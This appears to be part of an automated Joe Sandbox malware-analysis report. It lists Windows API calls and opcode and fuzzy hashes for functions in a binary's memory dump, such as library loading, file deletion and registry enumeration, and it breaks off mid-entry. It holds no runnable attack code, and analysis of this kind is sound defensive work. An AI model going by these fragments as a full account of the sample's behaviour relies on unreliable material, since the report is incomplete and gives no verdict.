                                                                                                                                                                              • Instruction ID: b594bf36ec89ad464f12ca68e1add804ee22c7d64ee88630ef59199e3d2f4bd2
                                                                                                                                                                              • Opcode Fuzzy Hash: b7290c6e50f7337ebcad9dacf4efb55d99eb4ec26bab39b73d5ca8607e39d1e2
                                                                                                                                                                              • Instruction Fuzzy Hash: D321BF31600018EFCF258F95DC5DEFA7FB9EB49310F544259FA096B1A2D3B19950DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00DA1AF4
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DE31F9
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00DE3203
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00DE320E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 4127811313-2063206799
                                                                                                                                                                              • Opcode ID: d39d16a06c84bd2067b93a98d4a654db606c388096c4d77ae2d641ea322dcd6c
                                                                                                                                                                              • Instruction ID: bdb9d5df1cdae5951c8d3f857505c463b3f2eb719ac584d207d6b3d921e2ccf0
                                                                                                                                                                              • Opcode Fuzzy Hash: d39d16a06c84bd2067b93a98d4a654db606c388096c4d77ae2d641ea322dcd6c
                                                                                                                                                                              • Instruction Fuzzy Hash: F3112835A01119AFDB10EFA9D94A9EE7BB8FB45350F100456E912A3140C771AA96CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DC508E,?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002), ref: 00DC50FD
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DC5110
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00DC508E,?,?,00DC502E,?,00E698D8,0000000C,00DC5185,?,00000002,00000000), ref: 00DC5133
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: eaeaf8cd1eac2c0b444af347d76b0a846612eb37ef4b5bcf8b11f57fff3adf5a
                                                                                                                                                                              • Instruction ID: f8de642eb7680ab05125d2ca8b5312cde653c98ad77d7d6d68180fecb1649fb5
                                                                                                                                                                              • Opcode Fuzzy Hash: eaeaf8cd1eac2c0b444af347d76b0a846612eb37ef4b5bcf8b11f57fff3adf5a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF03130A44609BFDB115F95EC4DB9DBFB5EF08752F040069F805B2160DB745994CAA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00DFE785
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DFE797
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00DFE7BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                              • API String ID: 145871493-2590602151
                                                                                                                                                                              • Opcode ID: 057cc8900494d0f9a8464f520e04c8b6e24af503f0d0607587cea6ae3a53f8bd
                                                                                                                                                                              • Instruction ID: 42254fd1baaa66d95b53912f0871f6a87afc6bc3cdd0e4de202c6e4c12e9de55
                                                                                                                                                                              • Opcode Fuzzy Hash: 057cc8900494d0f9a8464f520e04c8b6e24af503f0d0607587cea6ae3a53f8bd
                                                                                                                                                                              • Instruction Fuzzy Hash: F6E0E57081661D9FD7216B215C88EBA27146F21B01B16C568FB42F6170DB30CD4886B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA664A
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA665C
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DA668B,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA666E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                              • API String ID: 145871493-3689287502
                                                                                                                                                                              • Opcode ID: 7c2490d001bb679d987a329c11afb608983ddf7f356742b9320777c155da9527
                                                                                                                                                                              • Instruction ID: afbfce797cf7f81155b1f8d2e2f13d767e9e9749163d263f65bb9870c08d99b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c2490d001bb679d987a329c11afb608983ddf7f356742b9320777c155da9527
                                                                                                                                                                              • Instruction Fuzzy Hash: 1DE0CD356076325F93111726BC0CB5E69289F83F22B0D0155FD00F2140DFA4CC0580F4
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6610
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA6622
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DE5657,?,?,00DA62FA,?,00000001,?,?,00000000), ref: 00DA6635
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                              • API String ID: 145871493-1355242751
                                                                                                                                                                              • Opcode ID: 81f8869727003be22c7df4ed310266a659e3de75f087e2b1292d952f14313b3b
                                                                                                                                                                              • Instruction ID: 413539ed4f8f1f0ad63d051dda2ad1a26bed05691d86206d2d6996a286fd2523
                                                                                                                                                                              • Opcode Fuzzy Hash: 81f8869727003be22c7df4ed310266a659e3de75f087e2b1292d952f14313b3b
                                                                                                                                                                              • Instruction Fuzzy Hash: E5D01736617A36AB42222B26BC1CACE6F14AF93F6130D0065B801B2164CF68CD05C6E8
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E135C4
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00E13646
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E1365C
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E1366D
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E1367F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Delete$Copy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3226157194-0
                                                                                                                                                                              • Opcode ID: ecc87bd5382ea0328a88e53f4d150f82b8c513fc69ebb4b2597fc99d81519ce0
                                                                                                                                                                              • Instruction ID: 32d84bde541ed4f891e5160e96d5f758ae65e3dc1996501a63438344c7f398a2
                                                                                                                                                                              • Opcode Fuzzy Hash: ecc87bd5382ea0328a88e53f4d150f82b8c513fc69ebb4b2597fc99d81519ce0
                                                                                                                                                                              • Instruction Fuzzy Hash: B4B14D72A00119ABDF11DBA4CC85EDEBBBDEF49314F1040AAF609B7151EB349B848B71
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00E2AE87
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E2AE95
                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E2AEC8
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2B09D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3488606520-0
                                                                                                                                                                              • Opcode ID: 0147b1b720d6ff32c1bb648fda0991fcbcf514ed1ed3b3de8e73e307bb979ef9
                                                                                                                                                                              • Instruction ID: 1907f60e3ab41a630cbb59944f712309bc9f4e8893b1c897c5b521d62dbcb80d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0147b1b720d6ff32c1bb648fda0991fcbcf514ed1ed3b3de8e73e307bb979ef9
                                                                                                                                                                              • Instruction Fuzzy Hash: 51A19C71A04301AFE720DF24D896F2AB7E1EB44714F548C5CF59A9B292CB71EC41CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C505
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C560
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E2C5C3
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00E2C606
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2C613
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 826366716-0
                                                                                                                                                                              • Opcode ID: 764c0031fc791558400df0a334e693a5894e59526bcc928ebb45a56660b230f5
                                                                                                                                                                              • Instruction ID: 3ab71279939d6cc9ad4ba3145dad004c7f910828e525fa1ef69ca44eb431d4b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 764c0031fc791558400df0a334e693a5894e59526bcc928ebb45a56660b230f5
                                                                                                                                                                              • Instruction Fuzzy Hash: 1161E431108241EFC714DF14D890E6ABBE5FF84318F14955CF49A9B292CB31ED46CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0D7CD,?), ref: 00E0E714
                                                                                                                                                                                • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0D7CD,?), ref: 00E0E72D
                                                                                                                                                                                • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00E0ED8A
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00E0EDC3
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0EF02
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0EF1A
                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E0EF67
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3183298772-0
                                                                                                                                                                              • Opcode ID: 280d14618afda0c0616933ebc9acdf02bb24804fe44eebb04e62c1a69eb8145e
                                                                                                                                                                              • Instruction ID: b10c3ad9af8b944a27f04009bd3474648a516d18052bb79f2031ba5c032eee94
                                                                                                                                                                              • Opcode Fuzzy Hash: 280d14618afda0c0616933ebc9acdf02bb24804fe44eebb04e62c1a69eb8145e
                                                                                                                                                                              • Instruction Fuzzy Hash: 1C5152B21083859BC724EBA4DC959DBB3ECEF85310F001D2EF585A3191EF31A6C88766
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E09534
                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00E095A5
                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00E09604
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E09677
                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E096A2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4136290138-0
                                                                                                                                                                              • Opcode ID: 0a28cd0c5dfee68d1db16ad0a89fa3e79b034b452a9ae7d59f58e567206a8f92
                                                                                                                                                                              • Instruction ID: ed32d2ebf81a85a0004a4c27a4f4f0356f67f8f13208803d80f1c884b8810f81
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a28cd0c5dfee68d1db16ad0a89fa3e79b034b452a9ae7d59f58e567206a8f92
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A516AB5A002199FCB14CF58D884EAABBF8FF88314B058159F916EB351E731E951CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E195F3
                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E1961F
                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E19677
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E1969C
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E196A4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2832842796-0
                                                                                                                                                                              • Opcode ID: 7b3cf0636037a3b9dffdd780de08082ca54b2104e84fa6f459ced02a04e628c2
                                                                                                                                                                              • Instruction ID: 557656ddf6f7090127fabb68312253ec020781dba267662c425eaa77a0c60213
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b3cf0636037a3b9dffdd780de08082ca54b2104e84fa6f459ced02a04e628c2
                                                                                                                                                                              • Instruction Fuzzy Hash: 70515C75A00219DFCB01DF65C890AAABBF5FF49314F088458E849AB362CB35ED41CFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E2999D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E29A2D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E29A49
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E29A8F
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00E29AAF
                                                                                                                                                                                • Part of subcall function 00DBF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E11A02,?,7529E610), ref: 00DBF9F1
                                                                                                                                                                                • Part of subcall function 00DBF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E00354,00000000,00000000,?,?,00E11A02,?,7529E610,?,00E00354), ref: 00DBFA18
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 666041331-0
                                                                                                                                                                              • Opcode ID: 2c2cd853e2992d52b91c9e73ccea7438d4a2b49a2edc7b54414476c299e1ba40
                                                                                                                                                                              • Instruction ID: 446cfcaddc53830f7cd2087cc6ef3725284ce35be71ba0cee2ac5e2bf058e654
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c2cd853e2992d52b91c9e73ccea7438d4a2b49a2edc7b54414476c299e1ba40
                                                                                                                                                                              • Instruction Fuzzy Hash: 26514D75604215DFCB10DF68D485999BBF0FF09324B04A099E84AAB762D731ED85CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E3766B
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00E37682
                                                                                                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E376AB
                                                                                                                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E1B5BE,00000000,00000000), ref: 00E376D0
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E376FF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
